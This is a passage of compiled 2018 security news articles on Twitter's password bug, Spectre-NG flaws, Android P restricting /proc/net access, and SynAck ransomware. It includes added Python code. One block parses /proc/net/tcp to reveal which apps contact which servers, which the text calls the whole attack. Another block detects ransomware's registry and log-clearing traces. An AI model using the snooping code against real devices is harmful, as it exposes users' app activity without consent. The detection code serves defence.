Agrawal said Twitter had found and resolved the problem itself, and that an internal investigation found no indication of a breach or of passwords being stolen or misused by insiders.
"We found this error ourselves, removed the passwords, and are implementing plans to prevent this bug from happening again," Agrawal said.


"We are very sorry this happened. We recognize and appreciate the trust you place in us, and are committed to earning that trust every day."
Still, the company urged all of its 330 million users to consider changing their passwords to be on the safe side.
How to Reset Twitter Password
To change your password on Twitter, click your profile picture in the top-right corner, then go to Settings and Privacy → Password. Type your current password, then enter a new, strong one.
In the Twitter app for iOS and Android, tap your profile picture in the top-left corner, then go to Settings and Privacy → Account → Change Password ("Password" on Android), and create a new, strong password.
You should also change the password on all other services where you have used the same password.
You are also advised to enable two-factor authentication service on Twitter, which adds an extra layer of security to your account and help prevent your account from being hijacked.


8 New Spectre-Class Vulnerabilities (Spectre-NG) Found in Intel CPUs
11.5.2018 thehackernews Vulnerability

A team of security researchers has reportedly discovered a total of eight new "Spectre-class" vulnerabilities in Intel CPUs, which also affect at least a small number of ARM processors and may impact AMD processor architecture as well.
Dubbed Spectre-Next Generation, or Spectre-NG, the partial details of the vulnerabilities were first leaked to journalists at German computer magazine Heise, which claims that Intel has classified four of the new vulnerabilities as "high risk" and remaining four as "medium."
The new CPU flaws reportedly originate from the same design issue that caused the original Spectre flaw, but the report claims one of the newly discovered flaws allows attackers with access to a virtual machine (VM) to easily target the host system, making it potentially more threatening than the original Spectre vulnerability.
"Alternatively, it could attack the VMs of other customers running on the same server. Passwords and secret keys for secure data transmission are highly sought-after targets on cloud systems and are acutely endangered by this gap," the report reads.
"However, the aforementioned Spectre-NG vulnerability can be exploited quite easily for attacks across system boundaries, elevating the threat potential to a new level. Cloud service providers such as Amazon or Cloudflare and, of course, their customers are particularly affected."
If you're unfamiliar with it, the Spectre vulnerability reported earlier this year relies on a side-channel attack against a processor's speculative execution engine, allowing a malicious program to read sensitive information such as passwords and encryption keys, including the kernel's own memory.
Although the German site did not disclose the name of the security researchers (or the team/company) who reported these flaws to Intel, it revealed one of the weaknesses was discovered by a security researcher at Google's Project Zero.
The site also claimed that the Google researcher reported the flaw to the chip makers almost 88 days ago, which suggests the researcher could reveal details of at least one flaw on May 7th, when the 90-day disclosure window closes, the day before the Windows Patch Tuesday.
Responsibly disclosing the Spectre-NG vulnerabilities to vendors is certainly good practice, but it seems the researchers who discovered the new series of Spectre-class flaws are keeping their names out of the news for now, perhaps to avoid criticism like that faced by CTS Labs after they disclosed partial details of AMD flaws with a dedicated website, polished graphics and videos.
Intel's Response to Spectre-NG Flaws
When asked about the new findings, Intel provided the following statement, which neither confirms nor denies the existence of the Spectre-NG vulnerabilities:
"Protecting our customers' data and ensuring the security of our products are critical priorities for us. We routinely work closely with customers, partners, other chip makers and researchers to understand and mitigate any issues that are identified, and part of this process involves reserving blocks of CVE numbers."
"We believe strongly in the value of coordinated disclosure and will share additional details on any potential issues as we finalize mitigations. As a best practice, we continue to encourage everyone to keep their systems up-to-date."
Meanwhile, when Heise was asked about the Common Vulnerabilities and Exposures (CVE) numbers reserved for the new Spectre-NG vulnerabilities, the journalist declined to share any details and commented:
"The CVEs are currently only naked numbers without added value. On the other hand, their publication might have meant a further risk to our sources that we wanted to avoid. That's why we decided against it at the moment. We will of course provide them later."
Brace For New Security Patches
The Spectre-NG vulnerabilities reportedly affect Intel CPUs, and there are also indications that at least some ARM processors are vulnerable to the issues, but the impact on AMD processors has yet to be confirmed.
According to the German site, Intel has already acknowledged the new Spectre-NG vulnerabilities and plans to release security patches in two waves: one in May, and a second currently scheduled for August.
Microsoft also plans to fix the issues by releasing a security patch with Windows updates in the upcoming months.
However, it’s currently unknown if applying new patches would once again impact the performance of vulnerable devices, just like what happened with the original Spectre and Meltdown vulnerabilities earlier this year.


Android P to Block Apps From Monitoring Device Network Activity
11.5.2018 thehackernews Android

Do you know that any app you have installed on your Android phone can monitor the network activities—even without asking for any sensitive permission—to detect when other apps on your phone are connecting to the Internet?
Obviously, they can't see the content of the network traffic, but they can easily find out which server you are connecting to, all without your knowledge. Knowing which apps you use often, which could be a competing app or a financial app, a "shady" or "malicious" app can abuse this information in various ways to breach your privacy.
But it seems like Google has planned to address this serious privacy issue with the release of its next flagship mobile operating system.
With Android P, any app will no longer be able to detect when other apps on your Android device are connecting to the Internet, according to the new code changes in Android Open Source Project (AOSP) first noticed by XDA Developers.
"A new commit has appeared in the Android Open Source Project to 'start the process of locking down proc/net,' [which] contains a bunch of output from the kernel related to network activity," XDA Developers writes.
"There's currently no restriction on apps accessing /proc/net, which means they can read from here (especially the TCP and UDP files) to parse your device's network activity. You can install a terminal app on your phone and enter cat /proc/net/udp to see for yourself."
However, the new changes applied to the SELinux rules of Android P will restrict apps from accessing some network information.

The SELinux changes will enable only designated VPN apps to access some of the network information, while other Android apps seeking access to this information will be audited by the operating system.
However, it should be noted that the new SELinux changes apply to apps targeting API level 28 running on Android P, which means that apps targeting API levels prior to 28 continue to have access to the device's network activity until 2019.
A few custom ROMs for Android, such as CopperheadOS, have already implemented these changes years ago, offering better privacy to their users.
As XDA developers pointed out, this new change introduced to the Android operating system appears to be very small that users will hardly notice, "but the implications for user privacy will be massive."
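To see what an app could learn from that file, the Python below, an added example (not Google's, XDA's or any ROM's code), parses the /proc/net/tcp format the XDA quote refers to and groups remote endpoints by the UID that owns each socket, which on Android identifies the app. The rows are constructed but follow the kernel's real column layout; the address decoding assumes a little-endian kernel, as on Android devices.

```python
"""Parse /proc/net/tcp the way a zero-permission app could before Android P:
it learns which remote hosts each UID (each installed app) is talking to,
without seeing a byte of payload.

Added example. The two connection rows are constructed; the column layout is
the kernel's. Addresses are decoded assuming a little-endian kernel.
"""
import socket
import struct

# Constructed sample in the exact shape the kernel prints (header, then one row per socket).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0201A8C0:B5A2 22D8B85D:01BB 01 00000000:00000000 00:00000000 00000000 10123        0 67890 1 0000000000000000 20 4 30 10 -1
   2: 0201A8C0:C1D4 076433C6:01BB 01 00000000:00000000 00:00000000 00000000 10456        0 67891 1 0000000000000000 20 4 30 10 -1
"""

TCP_STATES = {0x01: "ESTABLISHED", 0x0A: "LISTEN"}   # only the states used here; the kernel has more


def decode_endpoint(field):
    """'HHHHHHHH:PPPP' -> (ip, port).

    The IPv4 address is the in-memory 32-bit value printed in hex, so on a
    little-endian kernel the bytes come out reversed; the port is plain hex.
    """
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def parse_proc_net_tcp(text):
    """Return one dict per socket row: local, remote, state, uid."""
    rows = []
    for line in text.splitlines()[1:]:        # skip the header line
        parts = line.split()
        if len(parts) < 8:
            continue
        local_ip, local_port = decode_endpoint(parts[1])
        remote_ip, remote_port = decode_endpoint(parts[2])
        rows.append({
            "local": (local_ip, local_port),
            "remote": (remote_ip, remote_port),
            "state": TCP_STATES.get(int(parts[3], 16), parts[3]),
            "uid": int(parts[7]),
        })
    return rows


def remote_hosts_by_uid(text):
    """What a snooping app is after: {uid: {(remote_ip, port), ...}} for live connections.

    On Android each app runs under its own UID, so this maps directly to
    'which app is talking to which server'.
    """
    result = {}
    for row in parse_proc_net_tcp(text):
        if row["state"] == "ESTABLISHED":
            result.setdefault(row["uid"], set()).add(row["remote"])
    return result


if __name__ == "__main__":
    for uid, hosts in sorted(remote_hosts_by_uid(SAMPLE_PROC_NET_TCP).items()):
        print(uid, sorted(hosts))
```

On a device, `open("/proc/net/tcp").read()` in place of the sample string is the whole attack; the SELinux change described above makes that read fail for ordinary apps, which is why a one-line policy change has such a large privacy effect.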


First-Ever Ransomware Found Using ‘Process Doppelgänging’ Attack to Evade Detection
11.5.2018 thehackernews Ransomware

Security researchers have spotted the first-ever ransomware exploiting Process Doppelgänging, a new fileless code injection technique that could help malware evade detection.
The Process Doppelgänging attack takes advantage of a built-in Windows function, i.e., NTFS Transactions, and an outdated implementation of Windows process loader, and works on all modern versions of Microsoft Windows OS, including Windows 10.
Process Doppelgänging attack works by using NTFS transactions to launch a malicious process by replacing the memory of a legitimate process, tricking process monitoring tools and antivirus into believing that the legitimate process is running.
If you want to know more about how Process Doppelgänging attack works in detail, you should read this article I published late last year.
Shortly after the Process Doppelgänging attack details went public, several threat actors were found abusing it in an attempt to bypass modern security solutions.
Security researchers at Kaspersky Lab have now found the first ransomware, a new variant of SynAck, employing this technique to hide its malicious actions; it targets users in the United States, Kuwait, Germany and Iran.

Initially discovered in September 2017, the SynAck ransomware uses complex obfuscation techniques to prevent reverse engineering, but researchers managed to unpack it and shared their analysis in a blog post.
An interesting thing about SynAck is that this ransomware does not infect people from specific countries, including Russia, Belarus, Ukraine, Georgia, Tajikistan, Kazakhstan, and Uzbekistan.
To identify the country of a specific user, the SynAck ransomware matches keyboard layouts installed on the user's PC against a hardcoded list stored in the malware. If a match is found, the ransomware sleeps for 30 seconds and then calls ExitProcess to prevent encryption of files.
SynAck ransomware also prevents automatic sandbox analysis by checking the directory from where it executes. If it found an attempt to launch the malicious executable from an 'incorrect' directory, SynAck won't proceed further and will instead terminate itself.
Once it has infected a machine, like any other ransomware, SynAck encrypts the content of each targeted file with AES-256 in ECB mode and withholds the decryption key until the victim contacts the attackers and meets their demands.

SynAck can also display a ransom note on the Windows logon screen by modifying the LegalNoticeCaption and LegalNoticeText values in the registry. The ransomware also clears the event logs kept by the system to hinder forensic analysis of an infected machine.
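Two of the behaviours above leave host-side traces that are straightforward to alert on. The Python below is an added example of that detection logic, not Kaspersky's code: it runs over constructed records in the shape of Sysmon event 13 (registry value set) and Windows events 1102 (Security) and 104 (System) for a cleared log. The field names, the host names, and the allowlisted banner-setting process are assumptions to adapt to your own telemetry.

```python
"""Flag the two host-side traces the article attributes to SynAck: the
Winlogon legal-notice values being rewritten, and event logs being cleared.

Added example, not Kaspersky's analysis code. Events are constructed dicts
modelled on Sysmon 13 and Windows 1102/104; adapt the keys to your pipeline.
"""
import re

WINLOGON_NOTICE = re.compile(
    r"\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\LegalNotice(?:Caption|Text)$", re.I)
LOG_CLEARED = {("Security", 1102), ("System", 104)}

# Assumed: the one tool on this estate that legitimately sets the logon banner.
# Path-only allowlisting is weak on its own; pair it with signer or hash checks.
ALLOWED_NOTICE_WRITERS = {r"c:\program files\banneragent\banner.exe"}   # hypothetical

# Constructed sample events, oldest first.
SAMPLE_EVENTS = [
    {"channel": "Microsoft-Windows-Sysmon/Operational", "event_id": 13, "host": "ws01",
     "image": r"C:\Users\bob\AppData\Local\Temp\synack.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption",
     "details": "YOUR FILES ARE ENCRYPTED"},
    {"channel": "Microsoft-Windows-Sysmon/Operational", "event_id": 13, "host": "ws01",
     "image": r"C:\Users\bob\AppData\Local\Temp\synack.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText",
     "details": "contact us to get the key"},
    {"channel": "Microsoft-Windows-Sysmon/Operational", "event_id": 13, "host": "ws02",
     "image": r"C:\Program Files\BannerAgent\banner.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption",
     "details": "Authorised users only"},
    {"channel": "Security", "event_id": 1102, "host": "ws01", "image": None,
     "target": None, "details": "The audit log was cleared"},
]


def notice_set_events(events):
    """Sysmon 13 writes to the Winlogon legal-notice values by a non-allowlisted process."""
    hits = []
    for e in events:
        if e["event_id"] != 13 or not e.get("target") or not WINLOGON_NOTICE.search(e["target"]):
            continue
        if (e.get("image") or "").lower() not in ALLOWED_NOTICE_WRITERS:
            hits.append(e)
    return hits


def log_cleared_events(events):
    """Windows 1102 (Security) / 104 (System): an event log was cleared."""
    return [e for e in events if (e["channel"], e["event_id"]) in LOG_CLEARED]


def triage(events):
    """Per host: a score and the reasons behind it. The two behaviours together
    are a much stronger signal than either alone, which the sum reflects."""
    scores = {}
    for e in notice_set_events(events):
        entry = scores.setdefault(e["host"], {"score": 0, "reasons": []})
        entry["score"] += 50
        entry["reasons"].append(f"legal-notice value set by {e['image']}: {e['details']!r}")
    for e in log_cleared_events(events):
        entry = scores.setdefault(e["host"], {"score": 0, "reasons": []})
        entry["score"] += 40
        entry["reasons"].append(f"{e['channel']} log cleared (event {e['event_id']})")
    return scores


if __name__ == "__main__":
    for host, entry in triage(SAMPLE_EVENTS).items():
        print(host, entry["score"])
        for reason in entry["reasons"]:
            print("   ", reason)
```

The log-clearing rule is worth forwarding off-host in real time: by the time an analyst looks at the machine the 1102 record may be the only thing left in the log, so the copy that matters is the one that already reached the collector.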
Although the researchers did not say how SynAck lands on a PC, most ransomware spreads through phishing emails, malicious adverts on websites, and third-party apps and programs.
Therefore, always exercise caution when opening unsolicited documents sent by email, and do not click links inside them unless you have verified the source.
Although in this case only a few security and antivirus products can detect or alert you to the threat, it is always good practice to have an effective security suite on your system and keep it up to date.
Last but not least: to keep a tight grip on your valuable data, have a backup routine in place that copies all your important files to an external storage device that is not permanently connected to your PC.


Twitter is Testing End-to-End E